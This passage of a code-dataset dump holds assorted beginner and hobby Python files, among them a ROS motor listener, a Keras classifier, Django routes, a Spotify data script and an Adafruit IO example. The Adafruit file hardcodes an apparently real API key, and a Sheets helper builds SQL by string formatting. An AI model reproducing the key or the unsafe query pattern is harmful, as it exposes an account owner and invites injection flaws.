index\nprint(x[1])\n","repo_name":"SURAJPATIL6088/Python-Programs","sub_path":"Python Programming/Byte_array.py","file_name":"Byte_array.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23824822472","text":"import os\n\nsource = \"text.txt\"\ndestination = \"C:\\\\Users\\\\scott\\\\OneDrive\\\\Desktop\\\\text.txt\"\n\ntry:\n if os.path.exists(destination):\n print('File already exists')\n else:\n os.replace(source, destination)\n print(source + \" was moved\")\n\nexcept FileNotFoundError:\n print(source + \" was not found\")\n\nexcept Exception as e:\n print(e)","repo_name":"scottwhat/python-beginner-projects","sub_path":"filesystem/movefiles.py","file_name":"movefiles.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"15715919788","text":"#!/usr/bin/env python3\n\n##################################################\n### -- Node Description \n# This node will be responsible for listening to \n# communication coming from the microcontroller\n# responsible for motor control. The node\n# will then publish this recieved data to ROS\n\n##################################################\n### Imports\n##################################################\n\n# Standard imports\nimport signal\nimport sys\nimport rospy\nfrom std_msgs.msg import Int8\n\n# Serial communication imports\nimport serial\nimport time\n\n##################################################\n### Defines and Constants\n##################################################\n\n# Global constants for the interface protocol between\n# the lower-level microcontroller \nMSG_DELIMITER = '$'\nTABLE_START = \"S\"\nTABLE_END = \"E\"\n\n# Globally configure the UART serial communication\nser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\n\n# Flush the communication line\nser.flush()\n\n##################################################\n### Callbacks\n##################################################\n\n# --------------------------------------\n# ---- Method to handle sigints ----\ndef signal_handler(sig, frame):\n sys.exit(0)\n\n##################################################\n### Methods\n##################################################\n\n# -----------------------------------------------\n# --- Method to read the table of motor data ---\n# --- from the low-level microcontroller ---\ndef Main():\n # Register sigint callback\n signal.signal(signal.SIGINT, signal_handler)\n\n # Initialize the node with name \"motors_listener_node\"\n rospy.init_node('motors_listener_node', anonymous=True)\n\n # Create sensor topics to publish too\n right_motor_pub = rospy.Publisher('RightMotor', Int8, queue_size=10)\n left_motor_pub = rospy.Publisher('LeftMotor', Int8, queue_size=10)\n\n # indefinitely listen to the serial port\n while True:\n # Read in the current response \n line = ser.readline().decode('utf-8').rstrip()\n\n # If we recieve the 'start_table' character, then start\n # reading the table from the microcontroller\n if line == TABLE_START:\n ReadTable(right_motor_pub, left_motor_pub)\n\n\n# -----------------------------------------------\n# --- Method to read the table of motor data ---\n# --- from the low-level microcontroller ---\ndef ReadTable(right_motor_pub, left_motor_pub):\n # Read all the data\n right_motor_message = ReadByte()\n left_motor_message = ReadByte()\n\n # publish all the data\n right_motor_pub.publish(right_motor_message)\n left_motor_pub.publish(left_motor_message)\n \n \n# --------------------------------------\n# --- Read line from serial line ---\ndef ReadByte():\n b = int(ser.readline().decode('utf-8').rstrip())\n message = Int8()\n message.data = b\n\n return message \n\n\nif __name__ == '__main__':\n Main()","repo_name":"Shop-cleaning-vacuum/shop_vacuum_navigation","sub_path":"Ros/src/communications/scripts/motors_listener_node.py","file_name":"motors_listener_node.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18164626695","text":"import seperate_data\nimport sys,os\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.keras.preprocessing.image import 
ImageDataGenerator\nfrom tensorflow.keras.callbacks import Callback\nimport numpy as np\n\nclass myCallback(Callback):\n def on_epoch_end(self, epoch, logs={}):\n if(logs.get('loss')<0.02):\n self.model.stop_training=True\ncallbacks=myCallback()\nseperate_data.seperate_train_data(sys.argv[1])\n#dim1=[]\n#dim2=[]\n#for test_img in os.listdir('train\\\\'+'cat'):\n# img = imread('train\\\\cat\\\\'+test_img)\n# d1,d2,_ = img.shape\n# dim1.append(d1)\n# dim2.append(d2)\n#print(np.mean(dim1))\n#print(np.mean(dim2))\n#Mean image shape is around (356,410,3)\nimage_shape = (356,410,3)\n\nimg_gen = ImageDataGenerator(rescale=1/255)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3,3), input_shape=image_shape, activation='relu'))\nmodel.add(MaxPooling2D(2,2))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(MaxPooling2D(2,2))\nmodel.add(Conv2D(64, (3,3), activation='relu'))\nmodel.add(MaxPooling2D(2,2))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\ntrain_generator = img_gen.flow_from_directory('train', target_size=(356,410), batch_size=16,color_mode='rgb', class_mode='binary')\nr = model.fit_generator(\n train_generator,\n epochs=15,\n callbacks=[callbacks]\n \n)\n\nplt.plot(r.history['accuracy'])\nplt.show()\n\n\n","repo_name":"utkucolak/Dog-or-Cat-Classifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43638340277","text":"from django.conf.urls.static import static\nfrom django.urls import path\n\nfrom nat_clinic import settings\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.home, name='home'),\n path(\"logout/\", views.logout_user, name='logout'),\n path(\"register/\", views.register_user, name='register'),\n path(\"test/\", views.test, name='test'),\n path(\"record//\", views.record, name='record'),\n path(\"delete_record//\", views.delete_record, name='delete_record'),\n path(\"update_record//\", views.update_record, name='update_record'),\n path(\"add_record/\", views.add_record, name='add_record'),\n\n path(\"tasks/\", views.tasks, name='tasks'),\n path(\"task//\", views.task, name='task'),\n path(\"add_task/\", views.add_task, name='add_task'),\n path(\"update_task//\", views.update_task, name='update_task'),\n path(\"delete_task//\", views.delete_task, name='delete_task'),\n path('task_search/', views.task_search, name='task_search'),\n\n path(\"clients/\", views.clients, name='clients'),\n path(\"client//\", views.client, name='client'),\n path(\"add_client/\", views.add_client, name='add_client'),\n path(\"update_client//\", views.update_client, name='update_client'),\n path(\"delete_client//\", views.delete_client, name='delete_client'),\n path('client_search/', views.client_search, name='client_search'),\n\n path(\"test_template/\", views.test_template, name='test_template'),\n\n path(\"divisions/\", views.divisions, name='divisions'),\n path(\"staffs/\", views.staffs, name='staffs'),\n path(\"staff//\", views.staff, name='staff'),\n path(\"add_staff/\", views.add_staff, name='add_staff'),\n path(\"staff_search/\", views.staff_search, name='staff_search'),\n\n path(\"services/\", views.services, name='services'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, 
document_root=settings.MEDIA_ROOT)\n\n","repo_name":"rt-fan/djcrm","sub_path":"nat_clinic/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17727041801","text":"import pandas as pd\nimport google_drive as gd\n\n\ndef get_data_from_tic(df):\n \"\"\"\n Parses Table Instance Charts (TIC) from the DataFrame and returns list\n of columns and data values.\n :param df: DataFrame corresponding to the TIC.\n :return: tuple - list of columns of the table, list of list of records.\n \"\"\"\n target_row_id = \"Sample Row 1\"\n dfc = df.copy(deep=True)\n dfc.set_index(dfc.columns[0], inplace=True)\n i = dfc.index.to_list().index(target_row_id)\n sub = dfc[i:].to_dict(orient=\"records\")\n col_list = sub[0].keys()\n values = list()\n for r in sub:\n values.append(\n [v for v in map(\n lambda s: f\"'{s}'\" if not str.isnumeric(s) else s,\n r.values()\n )]\n )\n return col_list, values\n\n\ndef dfs_to_insert_stmt(df_dict):\n \"\"\"\n Parses the dict of DataFrames and returns Insert statements for each table.\n :param df_dict: dict - of DataFrames of TICs.\n :return: dict - key : table-name\n value: list of insert statements from each TIC DataFrame.\n \"\"\"\n insert_statements = dict()\n for table_name, dataframe in df_dict.items():\n col_list, rows = get_data_from_tic(dataframe)\n stmt_list = list()\n stmt = f\"INSERT INTO {table_name} ({','.join(col_list)}) VALUES\"\n for row in rows:\n _string = ','.join(row)\n _insert = f\"{stmt} ({_string});\"\n stmt_list.append(_insert)\n insert_statements[table_name] = stmt_list\n return insert_statements\n\n\ndef get_table_instance_charts():\n \"\"\"\n Returns all Table Instance Charts from Excel/Spreadsheet files with name\n like \"table instance\" (saved in Google Drive).\n :return: dict - key : file-name,\n value: dict (key: Table Name, value: DataFrame of TIC)\n \"\"\"\n drive = gd.GoogleDriveAPI()\n file_subset = \"table instance\"\n sheets = drive.get_unique_spreadsheets_list()\n sheets_df = pd.DataFrame(sheets)\n _condition = sheets_df.name.str.lower().str.contains(file_subset)\n target_files = sheets_df[_condition]\n files = dict()\n for file in target_files.to_dict(orient=\"records\"):\n _id, _name = file.get(\"id\"), file.get(\"name\")\n files[_name] = drive.sheet_to_df_dict(_id)\n return files\n","repo_name":"nsp8/GoogleDriveSheetsUtilities","sub_path":"database_util.py","file_name":"database_util.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42086995752","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\n\nqueue = deque()\nn = int(input())\n\nfor _ in range(n):\n x = input().split()\n if x[0] == \"push\":\n queue.append(x[1])\n elif x[0] == \"pop\":\n print(queue.popleft() if queue else -1)\n elif x[0] == \"size\":\n print(len(queue))\n elif x[0] == \"empty\":\n print(1 if len(queue)==0 else 0)\n elif x[0] == \"front\":\n print(queue[0] if queue else -1)\n elif x[0] == \"back\":\n print(queue[-1] if queue else -1)\n","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution527.py","file_name":"solution527.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16403429827","text":"\"\"\"Chrome Experience Sampling backend API.\n\nImplemented using Google 
Cloud Endpoints for App Engine.\n\"\"\"\n\nimport endpoints\nfrom protorpc import message_types\nfrom protorpc import remote\n\nfrom messages import SurveyMessage\nimport models\n\npackage = 'ChromeExperienceSampling'\n\n\n@endpoints.api(name='cesp', version='v1',\n scopes=[endpoints.EMAIL_SCOPE])\nclass ExperienceSamplingApi(remote.Service):\n \"\"\"CESP Backend API v1.\"\"\"\n\n @endpoints.method(SurveyMessage, message_types.VoidMessage,\n path='submitsurvey', http_method='POST',\n name='submitSurvey')\n def survey_submit(self, request):\n survey = models.SurveyModel.fromMessage(request)\n survey.put()\n return message_types.VoidMessage()\n\nAPPLICATION = endpoints.api_server([ExperienceSamplingApi])\n","repo_name":"googlearchive/experience-sampling","sub_path":"backend/survey_backend_api.py","file_name":"survey_backend_api.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"20032672987","text":"import sqlite3\nimport pytest\nfrom models.supplier import Supplier\nfrom services.product_service import ProductService\nfrom services.supplier_service import SupplierService\n\nDB_NAME = \"inventory.db\"\n\n\n@pytest.fixture\ndef test_db_connection():\n connection = sqlite3.connect(DB_NAME)\n yield connection\n\n\ndef test_add_supplier(test_db_connection):\n service = SupplierService(test_db_connection)\n supplier = Supplier(\n supplier_id=\"999\",\n supplier_name=\"TestSupplier\",\n contact_person=\"John Doe\",\n contact_number=\"123456789\",\n email=\"test@example.com\",\n )\n\n assert service.add_supplier(supplier) is True\n\n\ndef test_get_supplier_by_id(test_db_connection):\n service = SupplierService(test_db_connection)\n retrieved_supplier = service.get_supplier_by_id(\"1\")\n assert retrieved_supplier is not None\n\n\ndef test_get_all_suppliers(test_db_connection):\n service = SupplierService(test_db_connection)\n\n # Check if all suppliers are retrieved\n all_suppliers = service.get_all_suppliers()\n assert all_suppliers is not None\n assert len(all_suppliers) != 0\n\n\ndef test_update_supplier(test_db_connection):\n service = SupplierService(test_db_connection)\n\n # Update the supplier information\n updated_supplier = Supplier(\n supplier_id=\"3\",\n supplier_name=\"UpdatedSupplier\",\n contact_person=\"Updated John\",\n contact_number=\"987654321\",\n email=\"updated@example.com\",\n )\n service.update_supplier(updated_supplier)\n\n # Check if the supplier is updated successfully\n retrieved_supplier = service.get_supplier_by_id(\"3\")\n assert retrieved_supplier is not None\n assert retrieved_supplier.supplier_name == \"UpdatedSupplier\"\n assert retrieved_supplier.contact_person == \"Updated John\"\n assert retrieved_supplier.contact_number == \"987654321\"\n assert retrieved_supplier.email == \"updated@example.com\"\n\n\ndef test_delete_supplier(test_db_connection):\n service = SupplierService(test_db_connection)\n service.delete_supplier(\"15\")\n\n # Check if the supplier is deleted successfully\n retrieved_supplier = service.get_supplier_by_id(\"15\")\n assert retrieved_supplier is None\n","repo_name":"zYasser/Inventory-Management-System","sub_path":"test/test_supplier.py","file_name":"test_supplier.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41859198415","text":"import numpy as np\nimport itertools as it\nimport collections\n\n\nclass EMGLogic(object):\n\n def 
createTimeStepsArray(self, signal):\n        dt = float(signal.sampling_period)\n        return np.linspace(0.0, float(dt*signal.size - dt), num=signal.size)\n\n    def __init__(self, emg_signal, fid=None, trigger_threshold=1.0, window_begin=0.02, window_end=0.10, \\\n                 paired_pulse=True, pp_interval=0.03):\n        self.emg_signal = emg_signal\n        self.filename = fid.name\n        self.emg_signal_deriv = np.diff(self.emg_signal)\n        self.trigger_threshold = trigger_threshold\n        self.paired_pulse = paired_pulse\n        self.pp_interval = pp_interval\n        self.timesteps = self.createTimeStepsArray(emg_signal)\n        self.MinMaxTuple = collections.namedtuple('MinMaxTuple', 'minTime minValue maxTime maxValue peak2peak')\n        self.updateParameters(window_begin, window_end, trigger_threshold)\n\n    def updateParameters(self, begin, end, trigger_threshold):\n        self.trigger_dict = dict()\n        self.window_begin = begin\n        self.window_end = end\n        self.trigger_threshold = trigger_threshold\n        self.response_window_time = np.array([self.window_begin,self.window_end])\n        self.response_window_indices = self.response_window_time*self.emg_signal.sampling_rate\n        self.fillTriggerDict()\n\n    def fillTriggerDict(self):\n        \"\"\" Fill self.trigger_dict by detecting TMS spikes, and map those timepoints \n        to their min and max response values.\n        \"\"\"\n        trigger_indices = self.findTriggerIndices(self.emg_signal_deriv, self.trigger_threshold)\n        for index in trigger_indices:\n            self.trigger_dict[self.timesteps[index]] = self.findResponseMinMaxs(index)\n\n    def findTriggerIndices(self, signal_deriv, threshold):\n        \"\"\"Given a signal's derivative, return the indices where it is at or above\n        a certain threshold.\n        \"\"\"\n        trigger_array, = np.ma.nonzero(np.ma.masked_less(signal_deriv, threshold))\n        trigger_list = trigger_array.tolist()\n        # Trigger waiting period: for paired pulse data there are two triggers within 30ms of each other.\n        # Skip ahead the corresponding number of samples to avoid tagging both triggers. Non-pp data\n        # doesn't have close-together triggers so we can do this safely for both.\n        if self.paired_pulse:\n            trigger_waiting_period = int(self.pp_interval*self.emg_signal.sampling_rate)\n            
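# example (illustrative numbers): at a 1 kHz sampling rate with pp_interval=0.03,\n            # any trigger within 30 samples of the previous one is treated as the second\n            # pulse of a pair and dropped below\n            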
# Quick way to find which triggers are close together\n            secondary_triggers_indices, = np.where(abs(np.diff(trigger_list)) < trigger_waiting_period)\n            # Delete-by-index must be done in reverse order. Otherwise all the indices shift\n            for sec_trigger in sorted(secondary_triggers_indices, reverse=True):\n                del trigger_list[sec_trigger+1]\n        return trigger_list\n\n    def findResponseMinMaxs(self, trigger_index):\n        \"\"\"Find the min and max response after a trigger\n        at the given index\"\"\"\n        window_start_index = trigger_index + int(self.response_window_indices[0])\n        window_stop_index = trigger_index + int(self.response_window_indices[1])\n        window = self.emg_signal[window_start_index:window_stop_index]\n        max_index = np.argmax(window)\n        min_index = np.argmin(window)\n        window_max = window[max_index]\n        window_min = window[min_index]\n        final_min_index = window_start_index+min_index\n        final_max_index = window_start_index+max_index\n        # Prepare return values\n        minTime=self.timesteps[final_min_index]\n        minValue=self.emg_signal[final_min_index]\n        maxTime=self.timesteps[final_max_index]\n        maxValue=self.emg_signal[final_max_index]\n        peak2peak = abs(maxValue) + abs(minValue)\n        triggerTuple = self.MinMaxTuple(minTime=minTime, \\\n                                        minValue=minValue, \\\n                                        maxTime=maxTime, \\\n                                        maxValue=maxValue, \\\n                                        peak2peak=peak2peak)\n        return triggerTuple\n\n    def addTriggerTimepoint(self, trigger_time):\n        new_trigger_index = np.argmin(abs(self.timesteps - trigger_time))\n        self.trigger_dict[self.timesteps[new_trigger_index]] = \\\n            self.findResponseMinMaxs(new_trigger_index)\n        return self.timesteps[new_trigger_index]\n\n    def writeInfoToCSV(self, outputPath):\n        # np.hstack needs a sequence of arrays, not a bare generator\n        np.savetxt(outputPath, \\\n            np.vstack([\n                np.hstack([arr.reshape(-1,1) for arr in \\\n                    [self.getTriggerTimePoints(), \\\n                    self.getTriggerMinTimes(), \\\n                    self.getTriggerMins(), \\\n                    self.getTriggerMaxTimes(), \\\n                    self.getTriggerMaxs(), \\\n                    self.getTriggerMeans(), \\\n                    self.getTriggerP2Ps()]]),\n                \\\n                np.array([0,0,0,0,0,0,self.getFinalAverage()])]), \\\n            header=\"trigger,min_time,min_value,max_time,max_value,mean,peak2peak,finalAverage\", delimiter=\",\", \\\n            fmt=\"%.5e\")\n\n    def getSignalInfo(self):\n        infoStrings = []\n        infoStrings.append(\"*\"*80)\n        infoStrings.append(\"Info for: {}\".format(self.filename))\n        infoStrings.append(\"[trigger time, MEP Amplitude]\")\n        infoStrings.append(\"=============================\")\n        infoStrings.append(str(np.hstack([arr.reshape(-1,1) for arr in [self.getTriggerTimePoints(), self.getTriggerP2Ps()]])))\n        infoStrings.append(\"Average MEP Amplitude: {}\".format(self.getFinalAverage()))\n        return \"\\n\".join(infoStrings)\n\n    def getTriggerTimePoints(self):\n        return np.array(sorted(self.trigger_dict))\n\n    def getTriggerMins(self):\n        return np.array([self.trigger_dict[trigger_time].minValue for trigger_time in sorted(self.trigger_dict)])\n\n    def getTriggerMinTimes(self):\n        return np.array([self.trigger_dict[trigger_time].minTime for trigger_time in sorted(self.trigger_dict)])\n\n    def getTriggerMaxs(self):\n        return np.array([self.trigger_dict[trigger_time].maxValue for trigger_time in sorted(self.trigger_dict)])\n\n    def getTriggerMaxTimes(self):\n        return np.array([self.trigger_dict[trigger_time].maxTime for trigger_time in sorted(self.trigger_dict)])\n\n    def getTriggerMeans(self):\n        return (self.getTriggerMins() + self.getTriggerMaxs()) / 2\n\n    def getTriggerP2Ps(self):\n        return abs(self.getTriggerMins()) + abs(self.getTriggerMaxs())\n\n    def getFinalAverage(self):\n        return np.mean(self.getTriggerP2Ps())","repo_name":"chrismullins/Mavin","sub_path":"emgviewerqt/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"19676312547","text":"\"\"\"\nTutorial - Sessions\n\nStoring session data in CherryPy applications is very easy: cherrypy\nprovides a dictionary called \"session\" that represents the session\ndata for the current user. If you use RAM based sessions, you can store\nany kind of object into that dictionary; otherwise, you are limited to\nobjects that can be pickled.\n\"\"\"\n\nimport cherrypy\n\n\nclass HitCounter:\n \n _cp_config = {'tools.sessions.on': True}\n \n def index(self):\n # Increase the silly hit counter\n count = cherrypy.session.get('count', 0) + 1\n \n # Store the new value in the session dictionary\n cherrypy.session['count'] = count\n \n # And display a silly hit count message!\n return '''\n During your current session, you've viewed this\n page %s times! Your life is a patio of fun!\n ''' % count\n index.exposed = True\n\n\ncherrypy.tree.mount(HitCounter())\n\n\nif __name__ == '__main__':\n import os.path\n thisdir = os.path.dirname(__file__)\n cherrypy.quickstart(config=os.path.join(thisdir, 'tutorial.conf'))\n","repo_name":"heynemann/skink","sub_path":"skink/lib/cherrypy/tutorial/tut07_sessions.py","file_name":"tut07_sessions.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"37"} +{"seq_id":"26709793676","text":"#!/usr/bin/env python\n\ndef sumsquares(n):\n\tret = 0 \n\tfor i in range(1,n+1):\n\t\tret += i ** 2\n\treturn ret\n\ndef squaressum(n):\n\tsum = 0.5 * n * (n+1) # Use sum of n formula\n\treturn sum ** 2\n\nn = int(squaressum(100) - sumsquares(100))\n\nprint(n)\n","repo_name":"colinbrophy/euler","sub_path":"prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18796074540","text":"import base64\nimport requests\n\nfor i in range(1,6):\n url = 'http://43.138.37.199:12345/jsfuck/api?page=%d' % i\n sign = base64.b64encode(('/jsfuck/api?page=%d' % i).encode('utf-8'))\n sign = sign.decode('utf-8')\n headers = {\n 'user-agent': 'apecome.com',\n 'sign': sign\n }\n resp = requests.get(url, headers=headers).json()\n msg = resp['msg']\n print(msg)\n","repo_name":"konatax/crawler","sub_path":"bikongge/02_jsfuck/02_jsfuck.py","file_name":"02_jsfuck.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72243925866","text":"from dictionary import*\nfrom encryption import*\nfrom decryption import*\n\nclass HancSecurity:\n\n def __init__(self, key = 0, user_input = \"User Message\", crypt_type = \"encrypt\"):\n self.user_input = user_input\n self.key = key\n self.crypt_type = crypt_type\n self.message = \"\"\n self.cipher = \"\"\n def crypting(self):\n try0 = HancSecurity(self.key, self.user_input, self.crypt_type)\n if try0.crypt_type == \"encrypt\":\n output = encrypt(self.key, self.user_input)\n else:\n output = decrypt(self.key, self.user_input)\n return output\n\ndef main():\n key1 = int(input(\"Please enter your key: \"))\n use_mgs1 = input(\"Please enter your text: \")\n crypt1 = input(\"Please enter your encryption_type [encrypt/decrypt]: \")\n try0 = HancSecurity(key1, use_mgs1, crypt1)\n try1 = try0.crypting()\n print(try1)\nif __name__== \"__main__\":\n 
main()\n","repo_name":"hanchannmakara/csc101_project_hanc","sub_path":"hanc_combined_codes.py","file_name":"hanc_combined_codes.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1415890393","text":"\"\"\"\n'random_data.py'\n================================================\nExample for accessing the Adafruit IO Random\nData Service.\n\nAuthor(s): Brent Rubell for Adafruit Industries\n\"\"\"\n# Import JSON for forecast parsing\nimport json\n# Import Adafruit IO REST client.\nfrom Adafruit_IO import Client, Feed, RequestError\n\n# Set to your Adafruit IO key.\nADAFRUIT_IO_USERNAME = 'brubell'\nADAFRUIT_IO_KEY = '6ec4b31bd2c54a09be911e0c1909b7ab'\n\n# Create an instance of the REST client.\naio = Client(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\n\ngenerator_id = 1461\n\n# Get the specified randomizer record with its current value and related details.\nrandom_data = aio.receive_random(generator_id)\n# Parse the API response\ndata = json.dumps(random_data)\ndata = json.loads(data)\nprint('Random Data: {0}'.format(data['value']))","repo_name":"adafruit/Adafruit_IO_Python","sub_path":"examples/api/random_data.py","file_name":"random_data.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"37"} +{"seq_id":"13181824028","text":"from joblib import Parallel, delayed\nimport R_Breaker_faster\nimport pandas as pd\nimport time\n\n\ndef run(start: str, end: str):\n    all_ = [[5 * i, j] for i in range(1, 7) for j in range(1, 4) if 5 * i != 5 or j != 2]\n    return Parallel(n_jobs=-1)(delayed(R_Breaker_faster.run)(start, end, 25, 1, 0.05, 0.01, 10, j, i) for i, j in all_)\n\n\nif __name__ == '__main__':\n    start_time = time.time()\n    df = pd.concat(run('20210101', '20230217'), ignore_index=True)\n    df = df.sort_values('annualized_returns', ascending=False)\n    df = df[['n_std', 'n_bias', 'annualized_returns', 'sharpe', 'max_drawdown']]\n    df.to_csv('params.csv', index=False)\n    print(df)\n    print(f\"Total elapsed: {(time.time() - start_time) / 60: .2f} minutes\")\n","repo_name":"Evanzhengyifan/pythonProject","sub_path":"Litehedge/tactics_py/R-Breaker/R_Breaker_faster_parallel.py","file_name":"R_Breaker_faster_parallel.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71598719789","text":"import spotipy\nimport spotipy.util as util\nfrom functions import get_all_api_results, get_tracks_df, \\\n    get_artists_df, get_audio_feature_df, get_all_playlist_tracks_df, music_recommendations_df\n\nimport pandas as pd\n#from spotipy.oauth2 import SpotifyOAuth\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\n# client credentials\nid = 'xxxxxxxxxx'\nsecret = 'xxxxxxxxxx'\nuri = 'xxxxxxxxxx'\nuser_name = 'xxxxxxxxxx'\n\n# using scopes\nscope = \"user-library-read user-follow-read user-top-read playlist-read-private\"\n\n# Authorization flow\ntoken = util.prompt_for_user_token(user_name, scope, client_id=id, client_secret=secret, redirect_uri=uri)\n\nif token:\n    sp = spotipy.Spotify(auth=token)\nelse:\n    print(\"Can't get token for\", user_name)\n\nprint(\"Extracting and transforming the top track data\")\ntop_tracks = get_all_api_results(sp, sp.current_user_top_tracks())\ntop_tracks_df = get_tracks_df(top_tracks)\ntop_tracks_df = get_audio_feature_df(sp, 
top_tracks_df)\ntop_tracks_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/top_tracks.csv\", index=False)\n\n\nprint(\"Extracting and transforming the top artists data\")\ntop_artists = get_all_api_results(sp, sp.current_user_top_artists())\ntop_artists_df = get_artists_df(top_artists)\ntop_artists_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/top_artists.csv\", index=False)\n\n\nprint(\"Extracting and transforming the followed artists data\")\nfollowed_artists = get_all_api_results(sp, sp.current_user_followed_artists())\nfollowed_artists_df = get_artists_df(followed_artists)\nfollowed_artists_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/followed_artists.csv\", index=False)\n\n\nprint(\"Extracting and transforming the followed playlist\")\nfollowed_playlists_tracks = get_all_api_results(sp, sp.current_user_playlists())\nplaylists_df = pd.DataFrame(followed_playlists_tracks)\nplaylist_basic_df = playlists_df[['id','name']].drop_duplicates(ignore_index=True)\nplaylist_basic_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/playlists.csv\", index=False)\n# playlists_ids = playlists_df['id'].tolist() # id list of all playlists\n# playlists_names = playlists_df['name'].tolist()\n\nprint(\"Extracting and transforming the selected playlist track data\")\nselected_playlist = playlists_df[playlists_df['name'].str.contains('Boxing')]['id']\nprint(selected_playlist)\nselected_playlist_tracks_df = get_all_playlist_tracks_df(sp, selected_playlist)\nselected_playlist_tracks_df = get_audio_feature_df(sp, selected_playlist_tracks_df)\nselected_playlist_tracks_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/followed_playlists_tracks.csv\", index=False)\n\nprint(\"Extracting and transforming the recommended songs\")\ntrack_rec = music_recommendations_df(sp, selected_playlist_tracks_df, 20)\nrec_tracks_df = get_tracks_df(track_rec).drop_duplicates(ignore_index=True) # remove duplication\nrec_tracks_df = get_audio_feature_df(sp, rec_tracks_df)\nrec_tracks_df.to_csv(\"/Users/Lawrence/Desktop/spotify_data/recommended_tracks.csv\", index=False)","repo_name":"lawrencelau915/spotify-track-recommendation-optimizer","sub_path":"get_music_data.py","file_name":"get_music_data.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22577281111","text":"import discord\nimport logging\n\nfrom discord.ext.cluster import Shard, ClientPayload\nfrom discord.ext import commands\n\nlogging.basicConfig(level=logging.INFO)\n\nlogging.getLogger(\"discord.http\").disabled = True\nlogging.getLogger(\"discord.client\").disabled = True\nlogging.getLogger(\"discord.gateway\").disabled = True\n\nclass MyBot(commands.Bot):\n    def __init__(self) -> None:\n        intents = discord.Intents.all()\n\n        super().__init__(\n            command_prefix=\"$.\",\n            intents=intents\n        )\n\n        self.shard = Shard(self, shard_id=1)\n\n    async def setup_hook(self) -> None:\n        await self.shard.connect()\n\n    @Shard.route(shard_id=1)\n    async def get_user_data(self, data: ClientPayload):\n        user = self.get_user(data.user_id)\n        return user._to_minimal_user_json()\n\nif __name__ == '__main__':\n    bot = MyBot()\n    
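# bot.run() is blocking and manages its own event loop; it must not be wrapped in asyncio.run()\n    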
